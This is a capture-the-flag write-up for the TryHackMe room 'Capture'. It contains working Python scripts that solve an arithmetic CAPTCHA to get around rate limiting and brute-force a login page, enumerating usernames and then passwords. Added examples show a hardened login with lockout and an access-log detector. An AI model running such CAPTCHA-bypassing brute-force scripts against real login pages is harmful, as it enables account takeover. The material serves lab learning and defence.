Capture Writeup - Tryhackme


👋 Introduction

Hi there! Capture is a room created by Toxicat0r on TryHackMe, rated Easy. It's actually quite simple if you know scripting. Without further ado, let's start!

๐Ÿ” Enumeration

As always, we start with nmap to find the open ports:
nmap 10.10.221.12 -vv

The results show just one open port: 80.
Download the task files and we find two files, usernames.txt and passwords.txt, which point to a brute-force attack.

The exploitation is fairly easy and involves writing a script to brute-force the login page, but the page has rate limiting in place and requires us to solve a CAPTCHA.

My solution for username enumeration in Python (using a regex to pull the CAPTCHA out of the response):

#!/usr/bin/env python3

import operator
import re

import requests

url = "http://10.10.88.108/login"

# The CAPTCHA is a plain "a <op> b" arithmetic challenge; map the operator
# to a function instead of handing matched page text to eval().
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}
CAPTCHA_RE = re.compile(r'([0-9]+)\s*([+\-*/])\s*([0-9]+)')


def solve_captcha(html):
    """Return the answer to the arithmetic CAPTCHA in the page, or None if absent."""
    m = CAPTCHA_RE.search(html)
    if not m:
        return None
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    result = OPS[op](a, b)
    # Send whole numbers without a trailing ".0"
    return int(result) if float(result).is_integer() else result


with open("usernames.txt", "r") as f:
    usernames = [line.strip() for line in f if line.strip()]

print("[+] Usernames extracted!")

for username in usernames:
    data = {"username": username, "password": "asdasd"}
    r = requests.post(url, data=data)

    if "Captcha enabled" in r.text:
        answer = solve_captcha(r.text)
        if answer is None:
            print("[!] CAPTCHA present but could not be parsed")
            continue
        data["captcha"] = answer
        r = requests.post(url, data=data)

    # The server answers differently for unknown and known usernames,
    # which is what makes this enumeration possible.
    if "does not exist" in r.text:
        print("[!] Invalid: " + username)
    elif "Invalid captcha" in r.text:
        print("[!] CAPTCHA failed")
    else:
        print("Username found:", username)
        break

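The script above only works because the login page answers "does not exist" for an unknown account and "Invalid password" for a known one, and because nothing stops one client from sending hundreds of guesses. As an added example (not part of the original writeup or of the room's code), here is a login check written the way a defender would: a single generic error for both failure cases, a decoy hash so unknown usernames take the same code path, and a sliding-window lockout keyed on both the source address and the target account. The user store, password and addresses are constructed for the demo.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict


def _hash(salt: bytes, password: str) -> bytes:
    # sha256 keeps the demo dependency-free; production code uses a slow
    # password hash such as bcrypt or argon2.
    return hashlib.sha256(salt + password.encode()).digest()


# Constructed demo credential store: username -> (salt, digest).
DEMO_PASSWORD = "demo-password-not-from-the-room"
_SALT = os.urandom(16)
USERS = {"natalie": (_SALT, _hash(_SALT, DEMO_PASSWORD))}

# Decoy record used for unknown usernames so they take the same code path
# (hash + compare) as real ones and cannot be told apart by reply or timing.
_DECOY_SALT = os.urandom(16)
_DECOY = (_DECOY_SALT, _hash(_DECOY_SALT, os.urandom(16).hex()))

GENERIC_ERROR = "Invalid username or password"
LOCKED_ERROR = "Too many attempts, try again later"


def login_leaky(username, password):
    """The behaviour the writeup exploits: the reply reveals whether a user exists."""
    if username not in USERS:
        return "The user does not exist"
    salt, digest = USERS[username]
    if hmac.compare_digest(_hash(salt, password), digest):
        return "OK"
    return "Invalid password"


def login_uniform(username, password):
    """Same check, but unknown users and wrong passwords get one identical reply."""
    salt, digest = USERS.get(username, _DECOY)
    ok = hmac.compare_digest(_hash(salt, password), digest)
    return "OK" if ok and username in USERS else GENERIC_ERROR


class AttemptLimiter:
    """Counts failed attempts per key inside a sliding window."""

    def __init__(self, max_attempts=5, window=300, clock=time.monotonic):
        self.max_attempts = max_attempts
        self.window = window
        self.clock = clock  # injectable so tests can control time
        self.failures = defaultdict(list)

    def _prune(self, key, now):
        self.failures[key] = [t for t in self.failures[key] if now - t < self.window]

    def is_blocked(self, key):
        self._prune(key, self.clock())
        return len(self.failures[key]) >= self.max_attempts

    def record_failure(self, key):
        self.failures[key].append(self.clock())


def handle_login(limiter, source_ip, username, password):
    """Apply the lockout, then the uniform credential check."""
    # Key on both the source and the target account: rotating usernames from
    # one address and spraying one account from many addresses both trip it.
    keys = (f"ip:{source_ip}", f"user:{username}")
    if any(limiter.is_blocked(k) for k in keys):
        return LOCKED_ERROR
    outcome = login_uniform(username, password)
    if outcome != "OK":
        for k in keys:
            limiter.record_failure(k)
    return outcome


if __name__ == "__main__":
    lim = AttemptLimiter(max_attempts=3, window=60)
    print(login_leaky("nobody", "x"), "|", login_leaky("natalie", "x"))
    print(login_uniform("nobody", "x"), "|", login_uniform("natalie", "x"))
    for _ in range(4):
        print(handle_login(lim, "10.0.0.1", "natalie", "wrong"))
```

The first two prints show the difference: the leaky variant gives two distinct strings, the uniform one gives the same string twice, so a script like the one above has nothing to key on. The loop shows the fourth attempt being refused by the limiter regardless of the password supplied.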
After some minutes of patience, the username was found. Password enumeration:

#!/usr/bin/env python3

import operator
import re

import requests

url = "http://10.10.88.108/login"

# Same arithmetic CAPTCHA handling as in the username script: dispatch on the
# operator rather than eval() the matched text.
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}
CAPTCHA_RE = re.compile(r'([0-9]+)\s*([+\-*/])\s*([0-9]+)')


def solve_captcha(html):
    """Return the answer to the arithmetic CAPTCHA in the page, or None if absent."""
    m = CAPTCHA_RE.search(html)
    if not m:
        return None
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    result = OPS[op](a, b)
    return int(result) if float(result).is_integer() else result


with open("passwords.txt", "r") as f:
    passwords = [line.strip() for line in f if line.strip()]

print("[+] Passwords extracted!\n")

for password in passwords:
    data = {"username": "natalie", "password": password}
    r = requests.post(url, data=data)

    if "Captcha enabled" in r.text:
        answer = solve_captcha(r.text)
        if answer is None:
            print("[!] CAPTCHA present but could not be parsed")
            continue
        data["captcha"] = answer
        r = requests.post(url, data=data)

    if "Invalid password" in r.text:
        print("[!] Invalid natalie : " + password)
    elif "Invalid captcha" in r.text:
        print("[!] CAPTCHA failed")
    else:
        print("Password found:", password)
        break

After running both scripts one after another, we have both the username and the password. Log in to get the flag!
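From the other side of the wire, an attack like this leaves an obvious trace: one source address posting to /login far more often than a human would. As an added example (not part of the original writeup), here is a small detector that parses combined-format web access log lines and flags any source exceeding a threshold of POSTs to the login path within a sliding window. The log lines, addresses and timestamps below are constructed for the demo; the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx combined log format, fields we need only.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one address hammering /login, one normal visitor.
SAMPLE_LOG = """\
10.10.14.5 - - [12/May/2023:10:00:01 +0000] "POST /login HTTP/1.1" 200 1140
10.10.14.5 - - [12/May/2023:10:00:02 +0000] "POST /login HTTP/1.1" 200 1140
10.10.14.5 - - [12/May/2023:10:00:03 +0000] "POST /login HTTP/1.1" 200 1187
10.10.14.5 - - [12/May/2023:10:00:04 +0000] "POST /login HTTP/1.1" 200 1187
10.10.14.5 - - [12/May/2023:10:00:05 +0000] "POST /login HTTP/1.1" 200 1187
10.10.14.5 - - [12/May/2023:10:00:06 +0000] "POST /login HTTP/1.1" 200 1187
10.10.14.9 - - [12/May/2023:10:00:30 +0000] "GET /login HTTP/1.1" 200 1024
10.10.14.9 - - [12/May/2023:10:00:45 +0000] "POST /login HTTP/1.1" 302 0
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], TS_FMT)
    d["status"] = int(d["status"])
    return d


def find_login_bursts(lines, path="/login", threshold=5, window_seconds=60):
    """Return {ip: peak_count} for sources that sent at least `threshold` POSTs
    to `path` within any `window_seconds` span."""
    recent = defaultdict(deque)  # ip -> timestamps of POSTs still inside the window
    flagged = {}
    for entry in (parse_line(l) for l in lines if l.strip()):
        if entry is None or entry["method"] != "POST" or entry["path"] != path:
            continue
        q = recent[entry["ip"]]
        q.append(entry["ts"])
        # Drop timestamps that have fallen out of the window relative to this hit.
        while (q[-1] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            flagged[entry["ip"]] = max(flagged.get(entry["ip"], 0), len(q))
    return flagged


if __name__ == "__main__":
    for ip, n in find_login_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"[!] {ip}: {n} POST /login within the window")
```

The detector deliberately ignores response status: in the room the login page answers 200 to every guess, so counting failures by status code would miss the whole burst. Pairing this with the uniform error message and lockout from the earlier hardening example gives both the prevention and the alert.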
